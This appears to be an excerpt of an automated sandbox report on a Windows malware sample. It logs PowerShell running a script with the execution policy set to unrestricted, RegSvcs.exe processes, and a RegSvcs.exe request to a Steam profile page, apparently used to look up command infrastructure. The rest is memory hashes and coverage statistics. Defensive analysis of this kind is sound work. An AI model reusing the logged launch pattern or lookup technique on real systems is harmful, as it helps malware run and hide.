                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.649710104.102.49.2544432828C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-15 07:24:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Host: steamcommunity.com
                                                                                                                                    2025-01-15 07:24:12 UTC1905INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Date: Wed, 15 Jan 2025 07:24:12 GMT
                                                                                                                                    Content-Length: 25665
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: sessionid=6315fec7fd7f6a857a9a686b; Path=/; Secure; SameSite=None
                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                    2025-01-15 07:24:12 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                    2025-01-15 07:24:12 UTC11186INData Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                    Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>


                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:02:24:06
                                                                                                                                    Start date:15/01/2025
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1"
                                                                                                                                    Imagebase:0x7ff6e3d50000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:02:24:06
                                                                                                                                    Start date:15/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:02:24:09
                                                                                                                                    Start date:15/01/2025
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                    Imagebase:0x1f0000
                                                                                                                                    File size:45'984 bytes
                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:02:24:09
                                                                                                                                    Start date:15/01/2025
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                    Imagebase:0xe50000
                                                                                                                                    File size:45'984 bytes
                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Reset < >
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2210061647.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 86c0ec6f8aca06ced78c0ae87d08683a747ae3e5faa056a866ee7fb1d0188ce0
                                                                                                                                      • Instruction ID: 37e125a39eba2144eb5bbee7ad6fdf275ebe344715d0482cd65000964db13225
                                                                                                                                      • Opcode Fuzzy Hash: 86c0ec6f8aca06ced78c0ae87d08683a747ae3e5faa056a866ee7fb1d0188ce0
                                                                                                                                      • Instruction Fuzzy Hash: 4F210A32B0CA190FFBE49AAC64675F8B3D1EF95220B1801BBD54EC3196DE1DA8155390
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e3a952469e76bbe1c7484c4fca4f66713aac8c441b560343841764b794841919
                                                                                                                                      • Instruction ID: 02edc4f712f8d6c21cf07f227a4c0dfa3d87d3858257e3a2fd7ae6447c21e48f
                                                                                                                                      • Opcode Fuzzy Hash: e3a952469e76bbe1c7484c4fca4f66713aac8c441b560343841764b794841919
                                                                                                                                      • Instruction Fuzzy Hash: 0E113A22F088474FE358E72C88A52BE6AC2DFD6350B04827AC149CB2E7DDACA80553C0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5b4834573925c58abbdbf741d42f4c78f5cafc66fde1cb05b88628c89a954d18
                                                                                                                                      • Instruction ID: 8ac35c90bbcee52048c249e9e9a16655173fd501db9ce4befb9b534519d434c4
                                                                                                                                      • Opcode Fuzzy Hash: 5b4834573925c58abbdbf741d42f4c78f5cafc66fde1cb05b88628c89a954d18
                                                                                                                                      • Instruction Fuzzy Hash: 24115921F086536FD3146B6C49E80F5BB86DF833687188232C508DB1AAECBCA801A2C0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9040f3e81028e6792769d9962f601b8bf43f4a29c760ff69a12d9745a07d0d63
                                                                                                                                      • Instruction ID: de847aa31c3f0fe7f7c2e4b16d19638a6b9550f0f3bfd19fd7b2e9f35928ae99
                                                                                                                                      • Opcode Fuzzy Hash: 9040f3e81028e6792769d9962f601b8bf43f4a29c760ff69a12d9745a07d0d63
                                                                                                                                      • Instruction Fuzzy Hash: 45019630B18D091FE398FB6C84697B9B3D1FF89345F40053DD64DC32A1DEA968808780
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                      • Instruction ID: dfb0dd717dbbec7b5157125531e6d1982f1fc1df843130dfbfd539fe6fbf756d
                                                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                      • Instruction Fuzzy Hash: 4801A77020CB0D4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DB36E882CB45
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2210061647.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f80c5608699d0a17d8da9445df1c95b81b93c83128b05e3bb031f8021036c9dc
                                                                                                                                      • Instruction ID: a1ed587db3566664a37f8600e837f8abdf06b98ded85982898bb1e9baeda1c32
                                                                                                                                      • Opcode Fuzzy Hash: f80c5608699d0a17d8da9445df1c95b81b93c83128b05e3bb031f8021036c9dc
                                                                                                                                      • Instruction Fuzzy Hash: 31F02723F0DA190FF7E0959C34771F456C1EFA662170802BBD54EC325ADC186C151390
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ed968292e70275f325302516adebca482ce2b806b2cd05c79d086e679d57e52d
                                                                                                                                      • Instruction ID: 3e07b6b527969b1b786d7e1208d4eb8f660332d02e4b2c70ddb8dbf626b0a9be
                                                                                                                                      • Opcode Fuzzy Hash: ed968292e70275f325302516adebca482ce2b806b2cd05c79d086e679d57e52d
                                                                                                                                      • Instruction Fuzzy Hash: 8CF08232B185168FDB18DB7CC9E15AD7296AFD1B107058278C509CB2D6EDBCAD0192C0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                                                                                      • Instruction ID: 4bf5512c4342aa2af7c73a45de70c10c9d986bf4e63a07c7223d61aecd3923a3
                                                                                                                                      • Opcode Fuzzy Hash: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                                                                                      • Instruction Fuzzy Hash: 80F0B774E1460F8FDB00DFA4C4815AEB7B0EB45710F144925D515E6291DA78AA449F90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2b65593afbf5e849fe5e44d76f78deedfefed89d347ac18b58bd1e2d83a87728
                                                                                                                                      • Instruction ID: 03ad7f695720703dfcf4a8ccf4d672b5b48b6f013a5051e2143010d3fd05d05b
                                                                                                                                      • Opcode Fuzzy Hash: 2b65593afbf5e849fe5e44d76f78deedfefed89d347ac18b58bd1e2d83a87728
                                                                                                                                      • Instruction Fuzzy Hash: F1E0DF21F1C3465FEB48BB7844F317AA5D1AF47240B4460BEDA8EC72C3DDADA409A781
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                      • Instruction ID: 78980d2ce36f83e2a53e5f2865153d6ad61f30c740566b427ceea72089bd7c7d
                                                                                                                                      • Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                      • Instruction Fuzzy Hash: BFC08031614111CFD16E562440710357167FB46205761547DD687D71D2CD7D6C019789
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4efe12a11574316ceba19af54d0b35bfa7985d7367df35fb55b53d47a62164ab
                                                                                                                                      • Instruction ID: 5357545cbaba070de19b0f1d3ba9681c96aad15ddccaffe46efbb0914505fb93
                                                                                                                                      • Opcode Fuzzy Hash: 4efe12a11574316ceba19af54d0b35bfa7985d7367df35fb55b53d47a62164ab
                                                                                                                                      • Instruction Fuzzy Hash: 29A00109A18152DAF155636681B197C44578B82228E6985BAA70A962D38C9CA90A26A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 972b3dd88f5aa827247247dd9115656e429befd3a059492400726a94035cd83f
                                                                                                                                      • Instruction ID: 36c980404a5dcf391044d2684ce2ad947a3ed6ac85017790352dfc4ded6da917
                                                                                                                                      • Opcode Fuzzy Hash: 972b3dd88f5aa827247247dd9115656e429befd3a059492400726a94035cd83f
                                                                                                                                      • Instruction Fuzzy Hash: B6523A30A0CA498FEB65DB68C4A16B97BE1FF47310B0501BAD54ED72E2DE6DAC05C781
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 48411b4845769b0c54151536c7cddf019a3ee3626d1ac8d28ce3f6efdef346d5
                                                                                                                                      • Instruction ID: 661d5568162789d674fd7b21e5094493f8785091f85ec7c60c1bd5d6f2462a08
                                                                                                                                      • Opcode Fuzzy Hash: 48411b4845769b0c54151536c7cddf019a3ee3626d1ac8d28ce3f6efdef346d5
                                                                                                                                      • Instruction Fuzzy Hash: 74D1A557A0E7D65EF363436C5CB60E97FD4DF5326470902F3CA94CE093AD8D281AA292
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d66ec7b8031ba5d6f8e7723751c443e4f26f8aab4ab52164d6fb22d9a004fc22
                                                                                                                                      • Instruction ID: 06a4a63748b00e5130c2fc05007739a6a5f3ef735def172853f799db19dae401
                                                                                                                                      • Opcode Fuzzy Hash: d66ec7b8031ba5d6f8e7723751c443e4f26f8aab4ab52164d6fb22d9a004fc22
                                                                                                                                      • Instruction Fuzzy Hash: D361A067F0D6D25EF312573C58B60EA3FE0DF53225B1A11F7C285CA093AD9E280696A1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6591b86b7448e3ecf0abb10cd571bb29f76524603b2b901ce20005e57cc1301f
                                                                                                                                      • Instruction ID: fa1c63f8f9deb893fdd02c75af36d5881edfa09e05acd662db84e79ff222da8d
                                                                                                                                      • Opcode Fuzzy Hash: 6591b86b7448e3ecf0abb10cd571bb29f76524603b2b901ce20005e57cc1301f
                                                                                                                                      • Instruction Fuzzy Hash: B251C45BB0DBD25EF75293289CF70E97BA0DF2376470901B3C691CA193ED4D180796A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cb2d68036423841a4206345574bba9788f5aa7183393aef522ee2a46d3bf7500
                                                                                                                                      • Instruction ID: ddd762bc13819a34c3b9c8c726bf4218be19fe03ac46b6adfc08a28289266e96
                                                                                                                                      • Opcode Fuzzy Hash: cb2d68036423841a4206345574bba9788f5aa7183393aef522ee2a46d3bf7500
                                                                                                                                      • Instruction Fuzzy Hash: F7514167E0DBC65EF36243285CB61997FE0DF13264B1A01F3CA94CE1A3AD8D68079691
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5114204244183ceea6c7c993abc074f0be4c276f5e81bd82594d2902a4aeac96
                                                                                                                                      • Instruction ID: ff773e0dc6dc7cceb30ef7c3dde86549d3e6710a4f3e39f91b3148919e28a176
                                                                                                                                      • Opcode Fuzzy Hash: 5114204244183ceea6c7c993abc074f0be4c276f5e81bd82594d2902a4aeac96
                                                                                                                                      • Instruction Fuzzy Hash: 3A319613E0E6D61EF6A1A7FC5CB64E67B94DF43368B0D02B6C649C60D3AD9C240651D2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 01f4888882f42ddda1c82615e0036d0a5c61463d6a48fefa754f67c4fd87bfc6
                                                                                                                                      • Instruction ID: 92dbcffa50fb12d5f8f9f7749a11b527a4a315de047e4c924e0dec0fb99defc0
                                                                                                                                      • Opcode Fuzzy Hash: 01f4888882f42ddda1c82615e0036d0a5c61463d6a48fefa754f67c4fd87bfc6
                                                                                                                                      • Instruction Fuzzy Hash: 46316762A1E7891FE35D9AB44C9A073BBE5EB4721470601BEC6C7CB6E3DD58680783C1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f366ee581a43d77d25af177ccadf107132b9945ba0a5365c405271d2810d5a8b
                                                                                                                                      • Instruction ID: 00779fd26c1432871d836551b3ba5e3e0d4b791a0052dc6dc1814f5627a90d20
                                                                                                                                      • Opcode Fuzzy Hash: f366ee581a43d77d25af177ccadf107132b9945ba0a5365c405271d2810d5a8b
                                                                                                                                      • Instruction Fuzzy Hash: 3C21C817E0E6D61EF2A262BC1CF74F67B94CF4326870901B7CA84CA4936C8C280761D2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9856f46512b3da13b523d6d8f4cb024724022dd5d169f5a765a106e1138f2cbc
                                                                                                                                      • Instruction ID: f2de6b811d63b3843820bad9063c12a78d8e71864f91ecc8d29a0a5c504b3f43
                                                                                                                                      • Opcode Fuzzy Hash: 9856f46512b3da13b523d6d8f4cb024724022dd5d169f5a765a106e1138f2cbc
                                                                                                                                      • Instruction Fuzzy Hash: 1B319696E0D6C25FF662432C5CFE0D93BE0EF5332474A01F2CA94C6193BD5D180B6695
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2209552693.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e81494e1f7190429d6c6ee42784af635b5b1f4e03a5e803a2a4c35292068fabc
                                                                                                                                      • Instruction ID: d3bec2a8ff67aff0e1543205ee00c5fa4cb16ce1cf43c0884ccaf9959865e342
                                                                                                                                      • Opcode Fuzzy Hash: e81494e1f7190429d6c6ee42784af635b5b1f4e03a5e803a2a4c35292068fabc
                                                                                                                                      • Instruction Fuzzy Hash: C4210771A0E7C51FD71E9A74482A42A7FA6DB8321070A82FFD183CB2E3DD5C58068781

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:1.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:24.6%
                                                                                                                                      Total number of Nodes:65
                                                                                                                                      Total number of Limit Nodes:3
